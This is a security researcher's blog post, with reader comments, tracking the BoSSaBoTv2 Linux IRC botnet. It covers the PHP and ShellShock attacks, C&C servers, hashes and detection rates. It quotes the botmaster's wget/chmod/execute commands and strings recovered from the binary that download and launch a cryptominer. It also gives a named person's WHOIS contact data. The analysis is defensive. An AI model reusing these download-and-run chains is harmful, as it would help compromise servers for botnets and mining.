[en] BoSSaBoTv2 : another Linux Backdoor IRC

Today, i was looking at my web honeypot and this one pay my attention : http://www.malekal.com/modsec/index.php?ip=178.32.59.202
The PHP vulnerability is very used (already wrote something about it : http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linux-tsunami-a/ ) but it was the first time i saw thoses base64decode code.

The code lead to haxmeup.uni.me (192.95.12.34 – OVH) that redirect to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg
I expect to get a PHP-Shellbot as usual, but this time, it was a FUD binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/1409041374/

so i launch it :

BoSSaBoTv2_modsec
BoSSaBoTv2_ircbackdoor

 

made a connection to 37.59.74.161 (OVH again) port 8067, there is an ircd behind :

nmap -sV 37.59.74.161 -p 8067

Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
Nmap scan report for 37.59.74.161
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
8067/tcp open irc Unreal ircd
Service Info: Host: irc.wix.wix

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

so an IRC Backdoor.

BoSSaBoTv2_ircbackdoor2
Another surprise, the ircd doesnt have any mod to hide users etc.
~40 bots, not so much.
So let’s play.
BoSSaBoTv2_ircbackdoor3

on the screenshot bellow, we can that the bostmaster launch a range IP scan, then some bots Exploit some servers.
We can see that the exploit at 200.185.236.85 was successfull because it joins the channel as a new bot.
BoSSaBoTv2_ircbackdoor4confirmed by my VM.
We got an other DNS con32.cz.cc that give the same IP 192.95.12.34
BoSSaBoTv2_ircbackdoor5

Two new bots :

BoSSaBoTv2_ircbackdoor6

The IRCd is new around ~40 bots in 9 days :

BoSSaBoTv2_ircbackdoor_ircd

The botmaster made regularly download new binary – all from www.bilder-upload.eu (seems legitim)

!BOSS* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
!BOSS* SH mv /tmp/05fbc4-1409059856.jpg  /tmp/4L2nJG5Vab
!BOSS* SH chmod 777 /tmp/4L2nJG5Vab
!BOSS* SH /tmp/4L2nJG5Vab

Some Hashs and Hosts recap :
haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34 – OVH)
haxmedown.cz.cc 37.59.74.161

http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33
http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902
http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e
http://malwaredb.malekal.com/index.php?hash=b36de738b5a807529f343f25a8ace0e0
http://malwaredb.malekal.com/index.php?hash=e9bb00d0faea2529cd5cc64147affdc4

BoSSaBoTv2_md5

then i wrote a little script to send the email abuse, hope, they will lose some bots 🙂

BoSSaBoTv2_abuse

 

MalwareMustDie decompile the binary, some strings : http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6
Thanks to them.

Bitcoin capabilities :

000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
000000007C20   pkill minerd ; pkill m32 ; pkill m64
000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s 
000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s

The most interresting :

000000007E1D   BoSSaBoTv2-%s

a search at Google this topic on http://www.hackforums.net/showthread.php?tid=4395309
According the date post, the kit is new and the price is at 100$

BoSSaBoTv2_ircbackdoor_disclosure

EDIT – September 8

Back, lot of attacks this WE :

http://www.malekal.com/modsec/index.php?ip=213.73.31.13
http://www.malekal.com/modsec/index.php?ip=195.154.140.251
http://www.malekal.com/modsec/index.php?ip=5.135.64.105
http://www.malekal.com/modsec/index.php?ip=46.105.230.91
http://www.malekal.com/modsec/index.php?ip=128.233.173.167

Binaries are undetected

http://malwaredb.malekal.com/index.php?hash=5453043042be4ad21259bcb9b17e9bd3
http://malwaredb.malekal.com/index.php?hash=36263d91d726dcdb93b97ea05ae8656a

IRCd : 23.95.10.101 port 53

BossaBot_comeback

EDIT – September 21 2014 : Two botnets

We found two differents botnets involved.
In the previous edit, you can see some screenshots with a channel #w00t
The IRCd move to IRC.DREAMBOXDB.COM (23.95.10.101:53/TCP) (binary http://malwaredb.malekal.com/index.php?hash=b40b2d32fe4eadea78ac469782c3963613c405813b0f994ce0bd7de800d20737).

Sloboz network

The guy behind this botnet seems to be Romanian :

IRCBot_sloboz_downloadIRCBot_sloboz_download2

He made download a .tgz : http://malwaredb.malekal.com/index.php?hash=61fbbfd71c43a27c96c07a82edab4ee9
The file crond is a binary detected as Spyware.Unix.Mech.A : https://www.virustotal.com/fr/file/68aef1145b4e208cf6600d2ccda0080d8ec7a7fe97354b92a7378b81975fbb63/analysis/

IRCBot_sloboz

it’s an IRCBackdoor – it connects to channels #linuxmafia and #m@trix on differents ircd including undernet network.
We can see the master is imp / sloboz / demo with a 23.* range IP (same Range as the BossaBackdoor C&C)

IRCBot_sloboz3

IRCBot_sloboz2

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

So i connect to undernet and the guy sloboz was also connected.
He use the same IP as the BossaBackdoor C&C : 23.95.10.101

IRCBot_sloboz5

IRCBot_sloboz4

As you can see there some G-Lined resulting of Virus Detection, this is the .tgz IRCBackdoor.

IRCBot_sloboz6

I also find this old topic where someone claim to get his nickname stolen on undernet network: http://www.undernet.org/forum/viewtopic.php?f=4&t=9471&start=0
The victim said that the author is : *** HeyHey is sloboz@86.104.220.177
The range lead to a Romaniam IP Range.

According this Urban dictionnary : http://www.urbandictionary.com/define.php?term=sloboz
There is also a City in Romania called Slobozia.

Seems he lose all his bots.

very pleased to see that antivirus has moved for his binary : https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/analysis/

SHA256:bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9
Nom du fichier :vti-rescan
Ratio de détection :16 / 53
Date d’analyse :2014-09-15 09:55:35 UTC (il y a 6 jours, 3 heures)
AntivirusRésultatMise à jour
Ad-AwareBackdoor.BossaBot.A20140915
AvastELF:BossaBot-A [Trj]20140915
BitDefenderBackdoor.BossaBot.A20140915
DrWebLinux.BackDoor.Irc.420140915
EmsisoftBackdoor.BossaBot.A (B)20140915
F-SecureBackdoor.BossaBot.A20140915
GDataBackdoor.BossaBot.A20140915
IkarusBackdoor.BossaBot20140915
KasperskyHEUR:Backdoor.Linux.Bassobo.a20140915
MicroWorld-eScanBackdoor.BossaBot.A20140915
NormanBossaBot.A20140914
SophosLinux/BosaBot-A20140915
SymantecLinux.Backdoor.Kaiten20140915
TencentWin32.Backdoor.Gen.Ugrc20140915
TrendMicro-HouseCallELF_BASSBOT.A20140915
nProtectBackdoor.BossaBot.A20140914

Snk / sult4n network

The second botnet – 2598 local users, if all are bots, this is not bad.
Notice the name Sult4n server.Bossa_sult4n

Binary : http://malwaredb.malekal.com/index.php?hash=132397a7e793fb4052f8d44634a15582 – C&C SRV5050.CO ; KA3EK.COM ; IRCQFRUM.COM (1.34.224.120) & 8RB.SU (144.76.40.132)
All theses domains are registered with the email address : sullt4n@hotmail.com

 
Administrative Contact ID: CR170538145
Administrative Contact Name: Sultan AL-Ghamdi
Administrative Contact Address1: Saudi arabia
Administrative Contact City: RiyadH
Administrative Contact State/Province: RiyadH
Administrative Contact Postal Code: 102345
Administrative Contact Country: Saudi Arabia
Administrative Contact Country Code: SA
Administrative Contact Phone Number: +966.533888508
Administrative Contact Email: sullt4n@hotmail.com

 

A look at Google give others old domains registed with the same IPs used as C&C for Windows IRC Backdoor : zerx-virus.biz and x01bkr2.biz

  • April 2009 : http://www.threatexpert.com/report.aspx?md5=7b3006772b76a997d4fc93e6c7b30142
  • Mars 2010 : MSN Worms : http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm%253aWin32%252fPushbot.FB&ThreatID=124698&Search=true#tab=2
  • July 2013 http://www.threatexpert.com/report.aspx?md5=a5e0f5419ce9d9f8e2aa1e241ca0505c

The address SRV5050.CO was well known because i made a write up on it, about Win32.Phorpiex a Skype Worm (in French) : http://www.malekal.com/2013/01/26/backdoor-irc-snk-se-propage-par-skype/
This worm was used to push FakeAv, Urausy Ransomware, Crypted Ransomware, Spambot and others malwares.
exposedbotnets.com call him « Snk » : http://www.exposedbotnets.com/2013/04/x01bkr2biz-snk-asper-mod-irc-botnet.html

This guy is very active for years!

EDIT – May 5 2015 : Comeback

Around 15th April, new attack to push some BossaBot.
Still PHP attacks :

BoSSaBot_April_2015
and ShellShock attempt with two differents URLs :

BoSSaBot_April_2015_attack2 BoSSaBot_April_2015_attack

 

IRCd :

BossaBot_ircd

 

The domain is suspended : https://twitter.com/malekal_morte/status/595496401041231872

EDIT – September 2015 : still active

Some day ago, got this ShellShock Attempt but the link was not working.
I reconize the URL used by BossaBot.

ShellShock_BossaBot

Today more ShellShock Attempt, all from OVH.
Here the list :

37.59.149.136
91.121.4.163
94.23.248.135
94.23.63.125
188.165.210.224
94.23.20.161
188.165.245.68
188.165.220.171
188.165.253.55
94.23.4.99
188.165.237.170
91.121.199.85
91.121.47.52
91.121.223.149

ShellShock_BossaBot_3

Also some PHP stuffs as before :

ShellShock_BossaBot_2
Binaries are old, 5 mouths old :

https://www.virustotal.com/fr/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/1443073141/
https://www.virustotal.com/fr/file/3a4f90405832615a5dbe59c64e6de50c2a1a3e9b372a8605daf60960d4bef016/analysis/1443073265/
https://www.virustotal.com/fr/file/5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af/analysis/1443073141/

but detections are still average :

SHA256:5e3b5056f9be5490a4332c1cc429b7d2ab12385909586bf297d145ff7d5a34af
Nom du fichier :susu2
Ratio de détection :14 / 56
Date d’analyse :2015-09-24 05:39:01 UTC (il y a 2 minutes)
AntivirusRésultatMise à jour
AVGLinux/Tsunami20150924
AhnLab-V3Linux/Ssabobot.B20150923
AvastELF:Tsunami-BH [Cryp]20150924
CAT-QuickHealLinux.Ropys.PR6b520150924
DrWebLinux.BackDoor.Sessox.120150924
ESET-NOD32a variant of Linux/Tsunami.NAL20150924
GDataLinux.Trojan.Agent.750WU520150924
JiangminBackdoor/Linux.oo20150922
KasperskyHEUR:Backdoor.Linux.Ropys.a20150924
NANO-AntivirusTrojan.Unix.Ropys.drxdby20150924
SophosMal/Generic-S20150923
SymantecLinux.Susiribot20150923
TencentLinux.Backdoor.Ropys.Liha20150924
ZillyaTrojan.Tsunami.Linux.8020150923

The IRCd is at 93.189.4.131:53 (Cloud-Servers)
Same IRCd mod as before.

ShellShock_BossaBot_4

gonna ping some abuse =)

EDIT – 6 October : stil active

still new binaries, MalwareMustDie made also an interresting tweet with an image link : http://t.co/OgNkLxSQGe

BossaBot_MalwareMustDie

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 199 times, 1 visits today)

9 thoughts on “[en] BoSSaBoTv2 : another Linux Backdoor IRC

  1. Using botnets of zombie computers to spread malicious code through vulnerabilities in order to perform cyber-based attacks like denial-of-service is a big mistake. Please, report this kind of cybercrime activities to federal law enforcement. Keep up the good work.

  2. GoDaddy, what about your ToS ?
    – IRCQFRUM.COM (62.75.202.19)
    – KA3EK.COM (62.75.202.19)
    – NADNADZZZ.INFO (62.75.202.19)
    – SRV5050.CO (62.75.202.19)
    – SAUDICOOL.ORG (62.75.202.19)
    – X01BKR2.BIZ (62.75.202.19)
    – ZERX-VIRUS.BIZ (62.75.202.19)
    – … Just Glue-it !?

    Hotmail / Live account ? What about Policies, Microsoft ?

    Hosting ( 62.75.202.19 ) Alo, PlusServer ? Schönen Dank !

    Malekal, this guy is active since a long time because it’s a Ping Pong party.
    Example : « If you would like to take further action … you should contact the … ( not us ) »

    Good luck, MalwareMustDie.

  3. – SAUDICOOL.ORG (198.136.49.210)

    – KA3EK.COM (62.75.246.5)
    – IRCQFRUM.COM (62.75.246.5)
    – LEBANONBT.INFO (62.75.246.5)
    – NADNADZZZ.INFO (62.75.246.5)
    – SRV5050.CO (62.75.246.5)
    – X01BKR2.BIZ (62.75.246.5)
    – ZERX-VIRUS.BIZ (62.75.246.5)

  4. [ 198.136.49.210 ]
    HOSTDIME.COM, INC.
    2603 CHALLENGER TECH CT
    SUITE 140, ORLANDO – FLORIDA
    UNITED STATES OF AMERICA

    – KA3EK.COM (198.136.49.210)
    – IRCQFRUM.COM (198.136.49.210)
    – LEBANONBT.INFO (198.136.49.210)
    – NADNADZZZ.INFO (198.136.49.210)
    – SAUDICOOL.ORG (198.136.49.210)
    – SRV5050.CO (198.136.49.210)
    – X01BKR2.BIZ (198.136.49.210)
    – ZERX-VIRUS.BIZ (198.136.49.210)

  5. – SAUDICOOL.ORG (188.40.254.145)
    > C&C 188.40.254.145:53/TCP
    > C&C 188.40.254.145:8080/TCP
    # RASHAD SHAHEEN
    # DISA COMPANY (DISA.JO)
    # SWEFIEH ST.
    # AMMAN, JORDAN

    – IRCQFRUM.COM (61.155.106.209)
    – KA3EK.COM (61.155.106.209)
    – X01BKR2.BIZ (61.155.106.209)
    – ZERX-VIRUS.BIZ (61.155.106.209)
    > C&C 61.155.106.209:53/TCP
    > C&C 61.155.106.209:8080/TCP
    # CHINA TELECOM
    # A12, XIN-JIE-KOU-WAI STREET
    # BEIJING 100088, CHINA

  6. – IRCQFRUM.COM (37.49.224.148)
    – KA3EK.COM (37.49.224.148)
    – X01BKR2.BIZ (37.49.224.148)
    – ZERX-VIRUS.BIZ (37.49.224.148)

    > C&C 37.49.224.148:53/TCP
    # ESTRO WEB SERVICES PRIVATE LIMITED
    # H. NO. 1, MANGU PANNA
    # TATESAR WALA RASTA, VILLAGE – JAUNTI
    # DELHI – 110081, INDIA

  7. – KA3EK.COM ( SUSPENDED )
    – IRCQFRUM.COM ( SUSPENDED )
    – LEBANONBT.INFO (37.49.224.148)
    – NADNADZZZ.INFO (188.40.254.145)
    – SAUDICOOL.ORG (198.136.49.210)
    – SRV5050.CO ( SUSPENDED )
    – X01BKR2.BIZ ( SUSPENDED )
    – ZERX-VIRUS.BIZ ( SUSPENDED )

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *